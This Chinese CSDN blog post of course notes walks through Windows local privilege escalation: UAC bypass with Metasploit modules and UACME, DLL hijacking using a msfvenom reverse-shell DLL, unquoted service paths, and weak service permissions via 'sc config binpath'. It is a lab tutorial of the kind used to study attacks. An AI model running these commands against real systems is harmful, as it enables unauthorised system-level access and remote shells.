【权限提升】WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限

已于 2024-07-03 09:59:41 修改
阅读量1.3k 收藏 3
点赞数 2
分类专栏: # 权限提升 文章标签: windows microsoft 网络安全
于 2023-02-24 22:46:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53009585/article/details/129129292
版权
文章内容复现于小迪安全相关课程

Win7&10-BypassUAC自动提权-MSF&UACME

用户账户控制-UAC

用户帐户控制User Account Control,简写作UAC)是 微软公司在其 Windows Vista及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对 应用程序使用 硬盘驱动器系统文件授权,以达到帮助阻止 恶意程序(有时也称为“ 恶意软件”)损坏系统的效果。

四种级别

总是通知将会:
当程序试图安装软件或对电脑做出更改时通知你。
当你对 Windows 设置进行更改时通知你。
冻结其他任务,直到你做出响应。
注意:如果你经常安装新软件或访问陌生网站,则推荐使用此选项。
仅当相关程序尝试更改我的计算机时通知我
当程序试图安装软件或对电脑做出更改时通知你。
当你对 Windows 设置进行更改时不通知你。
冻结其他任务,直到你做出响应。
注意:如果你经常安装新软件或访问不熟悉的网站,但更改 Windows 设置时不希望收到通知,则建议使用此选项。
仅当相关程序尝试更改计算机时通知我(不降低桌面亮度)
当程序试图安装软件或对电脑做出更改时通知你。
当你对 Windows 设置进行更改时不通知你。
不会冻结其他任务或等待响应。
注意:如果需要花费很长时间才能降低计算机上的桌面亮度时,才建议选择此选项。否则,建议选择上面的一种选项。
从不通知(禁用 UAC)将会:
当程序试图安装软件或对电脑做出更改时不通知你。
当你对 Windows 设置进行更改时不通知你。
不会冻结其他任务或等待响应。
注意:出于安全考虑,此选项不推荐使用。

为了远程执行目标的exe或者bat可执行文件绕过此安全机制,以此叫BypassUAC

绕过项目:MSF内置,UACME项目(推荐),Powershell渗透框架

开启UAC和未开启UAC时,MSF默认getsystem提权影响(进程注入)

未开启UAC getsystem直接提权成功:

开启UAC msf直接提权不成功:

1、MSF模块:

-Test in Win7 本地电脑 本地权限

use exploit/windows/local/bypassua

该模块不适用于win10操作系统:

-Test in Win10 本地电脑 本地权限

use exploit/windows/local/ask #对方电脑弹框,需要目标电脑确定,但是通杀各种版本

录制的视频有点大(一分半),插不进来,详见百度云视频链接

use exploit/windows/local/bypassuac_sluihijack
use exploit/windows/local/bypassuac_silentcleanup #使用方法类似,适用于win10操作系统

2、UACME项目:百度云链接

GitHub - hfiref0x/UACME: Defeating Windows User Account Control(可以自己下载最新版本源代码自行编译,百度云中是编译好的)

Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.
x86-32/x64 Windows 7/8/8.1/10/11 (client, some methods however works on server version too).
Admin account with UAC set on default settings required.

Run examples: 61个选项即61种方式绕过UAC

akagi32.exe 23
akagi64.exe 61
akagi32 23 c:\windows\system32\calc.exe
akagi64 61 c:\windows\system32\charmap.exe
好用的编号 23  61
Akagi64.exe 编号 调用执行

调用后门程序如果没反应的话就多尝试其他编号

3、Powershell渗透框架:

暂时搁置……

Win2012-DLL劫持提权应用配合MSF-FlashFXP

程序运行过程中加载的动态链接库;limux下以so为后缀

原理:Windows程序启动的时候需要DLL。如果这些DLL 不存在,则可以通过在应用程序要查找的位置放置恶意DLL来提权。


通常,Windows应用程序有其预定义好的搜索DLL的路径,它会根据下面的顺序进行搜索:
1、应用程序加载的目录
2、C:\Windows\System32
3、C:\Windows\System
4、C:\Windows
5、当前工作目录Current Working Directory,CWD
6、在PATH环境变量的目录(先系统后用户)

过程:信息收集-进程调试-制作dll并上传-替换dll-启动应用后成功

检测: ChkDllHijack 火绒剑

上方dll文件在C:\Windows目录下,普通用户权限不够,不能够劫持。下方dll文件在程序当前目录下,可以尝试劫持。

项目:GitHub - anhkgg/anhkgg-tools: Anhkgg's Tools 百度云链接

拖入程序,输入相关进程路径,检测能否劫持

能够劫持 测试程序flashfxp(模拟对方服务器上部署的ftp服务) 百度云链接

‘’不能劫持

利用火绒剑进行进程分析加载DLL,一般寻程序DLL利用。

msf生成 dll劫持文件

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.146 lport=4444 -f dll -o ssleay32.dll

提前信息收集相关软件及DLL问题程序,本地调试成功后覆盖DLL实现利用

条件:需要管理员去触发执行靶机上flashfxp程序,实现dll劫持

不带引号服务路径配合MSF-MacroExpert

原理:即使正确引用了服务路径,也可能存在其他漏洞。由于管理配置错误,用户可能对服务拥有过多的权限,例如,可以直接修改它导致重定向执行文件。
过程:检测服务权限配置-制作文件并上传-更改服务路径指向-调用后成功

检测项目:JAWS

GitHub - 411Hall/JAWS: JAWS - Just Another Windows (Enum) Script

Usage:

Run from within CMD shell and write out to file.


CMD C:\temp> powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt

Run from within CMD shell and write out to screen.


CMD C:\temp> powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1

Run from within PS Shell and write out to file.


PS C:\temp> .\jaws-enum.ps1 -OutputFileName Jaws-Enum.txt
带引号:
"C:\Program Files (x86)\Common Files\Adobe\AdobeUpdateService.exe"
带引号 有空格的目录还是一个整体
不带引号:
C:\Progra m Files (x86)\Common Files\Adobe\AdobeUpdateService.exe(中间有空格)
不带引号 有空格的目录就会认为是文件加参数
条件:需要目标靶机可以运行powershell脚本,

Test in win server 2008

这里我直接在靶机上直接运行的脚本,powershell上实在太慢了

生成了一个455kb的结果,截取其中我们想要获取的部分

以 C:\Program Files (x86)\Windows Media Player\wmplayer.exe 为例,我们将后门改查Program.exe 并且上传至C盘根目录下,等到服务器重启或者对应服务重启后,后门以system权限上线。

检测命令:(功能同JAWS 并且排查winodws下目录(windows目录下权限不够))

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

上传反弹exe,设置好对应执行名后,执行sc start "OfficeUpdateService"

不安全的服务权限配合MSF-NewServices

原理:即使正确引用了服务路径,也可能存在其他漏洞。由于管理配置错误,用户可能对服务拥有过多的权限,例如,可以直接修改它导致重定向执行文件。
过程:检测服务权限配置-制作文件并上传-更改服务路径指向-调用后成功 
检测脚本:accesschk PowerUp(PowerSploit)

1、accesschk.exe -uwcqv "administrators" *   #检测所有服务以权限
2、Import-Module .\PowerUp.ps1
Invoke-All Checks

重点关注 权限为 SERVICE_ALL_ACCESS 的服务

GitHub - PowerShellMafia/PowerSploit: PowerSploit - A PowerShell Post-Exploitation Framework

AccessChk - Sysinternals | Microsoft Learn

sc config "OfficeUpdateService" binpath="C:\Program.exe" #需要本地用户权限 webshell权限不行
sc start OfficeUpdateService
注:路径的空格引号问题 但是没有修改服务本身路径的权限
服务权限问题 可以修改服务对应的路径
部分复现有丢失,后续再补
An0nymouer
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BypassUAC-权限提升
weixin_45701675的博客
11-19 1268
什么是UAC?如何设置? UAC(UserAccount Control,用户账户控制) 简言之就是在Vista及更高版本中通过弹框进一步让用户 确认是否授权当前可执行文件来达到阻止恶意程序的目的。 可以通过命令msconfig启动管理器,更改UAC设置等级(默认等级) 参考:http://cn-sec.com/archives/116488.html #BypassUAC提权?常见绕过项目? 为了远程执行目标的exe或者bat可执行文件绕过此安全机制,以此叫BypassUAC 绕过项目:M
第102天:权限提升-WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限
qq_46081990的博客
06-22 338
【代码】第102天:权限提升-WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限
Windows权限提升BypassUACDLL劫持引号路径服务权限提权
最新发布
2401_84300239的博客
04-28 133
这里的图片我借用一下其它博客的,由于我自己电脑以及其它电脑,虚拟机都没有这样的路径。次序执行。
UACME - uac by pass工具,已编译版本下载
11-17
UACME - uac by pass工具,已编译版本。可以直接使用。 项目源代码 、使用说明参考 https://github.com/hfiref0x/UACME 未对代码进行任何修改,直接进行了编译。 经测试好用。 版本 v 3.6.3
使用BypassUAC:轻松绕过Windows用户账户控制
gitblog_00086的博客
03-29 596
使用BypassUAC:轻松绕过Windows用户账户控制 项目地址:https://gitcode.com/Memoryo3o/BypassUAC BypassUAC是一个开源项目,旨在帮助开发者和安全研究人员在Windows操作系统中进行UAC(User Account Control)规避。该项目由Memoryo3o开发并维护,提供了一种技术手段,使得在不触发典型UAC警告的情况下执行高权限...
DLL搜索的目录顺序(DLL劫持
WLINX
08-23 1344
DLL劫持是技术当一个可执行文件运行时,Windows加载器将可执行模块映射到进程的地址空间中,加载器分析可执行模块的输入表,并设法找出任何需要的DLL,并将它们映射到进程的地址空间中。由于输入表中只包含DLL名而没有它的路径名,因此加载程序必须在磁盘上搜索DLL文件。首先会尝试从当前程序所在的目录加载DLL,如果没找到,则在Windows系统目录中查找,最后是在环境变量中列出的各个目录下查找。(...
第62天:权限提升-烂土豆&dll劫持&引号路径&服务权限1
08-03
本文将深入探讨四种常见的提权技术:烂土豆、DLL劫持、不带引号服务路径以及不安全的服务权限配置,并通过具体案例来解析这些技术的工作原理和利用过程。 首先,烂土豆是一种Windows权限提升漏洞,它允许攻击者...
win764位&T+普及版TBillOneCore.dll组件.zip
09-06
标题中的"win764位&T+普及版TBillOneCore.dll组件.zip"指的是一个针对Windows 7 64位操作系统的压缩包文件,其中包含了用于解决畅捷通T+软件问题的特定组件——TBillOneCore.dll。这个DLL(动态链接库)文件是软件...
Dll文件jacob.dll & swt-win32-3139.dll
07-25
`swt-win32-3139.dll` 文件则关联于SWT(Standard Widget Toolkit),这是一个开源的Java图形用户界面(GUI)库。SWT是Eclipse IDE的基础组件之一,用于创建原生、高性能的Windows应用程序。`swt-win32-3139.dll` 是...
第60天:权限提升-MY&MS&ORA等SQL数据库提权1
08-03
首先,我们要明白数据库提权的基本前提:服务器上必须运行着数据库服务,并且攻击者需要掌握最高权限用户的密码。对于非Access数据库,如MySQL、SQL Server (MSSQL) 和Oracle (ORA),它们通常存在提权的可能性。 ##...
Hadoop本地调试 winutil.exe & hadoop.dll
11-15
Hadoop本地调试必要的文件 winutil.exe & hadoop.dll 使用方式:https://blog.csdn.net/qq_31772441/article/details/84076715
DccwBypassUACWindows 8.1和10 UAC绕过“ dccw.exe”中的WinSxS
02-06
DccwBypassUACWindows 8.1和10 UAC绕过“ dccw.exe”中的WinSxS
bypassuac提权
qq_46258964的博客
06-20 1304
UAC介绍 UAC是微软为提高系统安全性中引入的技术。 UAC要求用户在执行可能影响计算机运行的操作或者在进行可能影响其他用户的设置之前, 拥有相应的权限或者管理员密码。UAC在操作启动前对用户身份进行验证, 以避免恶意软件和间谍软件在未经许可的情况下在计算机上进行安装操作或者对计算机设置进行修改。 微软设置的安全控制策略,分为高、中、低三个等级。 高等级的进程有管理员权限;中等级的进程有普通管理员权限;低等级的进程,权限是有限的,以保证系统在受到安全威胁时造成的损害最小。uac绕过 为了远程执行目标的ex
UAC 实现原理及绕过方法
子曰小玖的博客
08-14 2990
0x00 UAC 工作流程 UAC 是微软在 Windows Vista 以后版本引入的一种安全机制, 通过 UAC应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员特别授予管理员级别的系统访问权限UAC 可以阻止未经授权的应用程序自动进行安装,并防止无意中更改系统设置。 https://msdn.microsoft.com/en-us/library/bb384608.aspx 从图上可以看到,如果要获取管理员权限,通过的路径有以下几条: 1,进程已经拥有管理权限控制; 2
【内网安全】——Windows提权姿势
qq_53058639的博客
01-27 881
令牌(Token):令牌(token)是系统的临时秘钥,相当于账号和密码,用来决定是否允许这次请求和判断这次请求是属于哪一个用户的。它允许你在不提供密码或其他凭证的前提下,访问网络和系统资源,这些令牌将持续存在于系统中,除非系统重新启动。令牌最大的特点就是随机性,不可预测,黑客或软件无法猜测出令牌。令牌分类访问令牌(Access Token): 表示访问控制操作主体的系统对象会话令牌(Session Token): 交互会话中唯一的身份标识符。
Windows提权笔记-服务路径未用引号闭合
墨痕诉清风的博客
03-12 122
Windows提权笔记-服务路径未用引号闭合
详解Bypass UAC 过程中踩过的坑(第二部分)
weixin_33892359的博客
09-18 555
本文讲的是详解Bypass UAC 过程中踩过的坑(第二部分),在第1部分完成后,我们知道普通用户在拆分令牌管理登录中处理可以获得对升级进程的Terminate,QueryLimitedInformation 和 Synchronize进程访问权限的访问。这是由于正常的用户和管理员具有默认DACL,该默认DACL授予对同一桌面上所有令牌设置的当前登录会...
DccwBypassUAC - Windows 8.1和10 UAC绕过dccw exe中的WinSxS
我的学习笔记
02-28 873
参考:https://github.com/L3cr0f/DccwBypassUAC这种漏洞利用“WinSxS”由“dccw.exe”通过衍生Leo的Davidson“Bypass UAC”方法管理,以获得管理员shell而不提示同意。它支持“x86”和“x64”体系结构。此外,它已经在Windows 8.1 9600,Windows 10 14393,...
内网渗透-权限提升(使用MSF提权的一些方法)
Ping_Pig的博客
07-03 3237
讲在前面:提权方法有很多种和,这里提供在利用MSF拿到低权限用户后利用MSF提权的办法 直接输入提升权限命令 meterpreter>getsystem 使用MSF内置bypassuac提权 MSF内置有多个bypassuac模块,原理有所不同,使用方法类似,运行后返回一个新会话后再次执行getsystem获取系统权限。 search bypassuac Matching Modules ================ # Name ...
win7system32权限dll文件
07-28
Win7系统中,如果你想将一个dll文件放入system32文件夹,你需要具有管理员权限。你可以通过以下步骤来实现: 1. 打开命令提示符窗口,可以通过按下Win键+R,然后输入"cmd"并按下回车键来打开。 2. 在命令提示符窗口中,输入以下命令并按下回车键: ``` icacls C:\Windows\system32 /grant administrators:F ``` 这个命令将会给administrators组分配对system32文件夹的完全控制权限。\[1\] 3. 输入以下命令并按下回车键: ``` copy <dll文件路径> C:\Windows\system32 ``` 将"<dll文件路径>"替换为你要放入system32文件夹的dll文件的实际路径。这个命令将会将dll文件复制到system32文件夹中。 4. 现在你应该成功将dll文件放入了system32文件夹中。请注意,这个操作需要管理员权限,所以确保你以管理员身份运行了命令提示符窗口。\[2\]\[3\] #### 引用[.reference_title] - *1* [Win7下如何重命名,替换System32文件夹下的系统文件](https://blog.csdn.net/zy_strive_2012/article/details/79470829)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [kernel32.dll动态链接库报错解决方法win7,怎么修复kernel32.dll文件缺失](https://blog.csdn.net/xiufujun/article/details/127266259)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值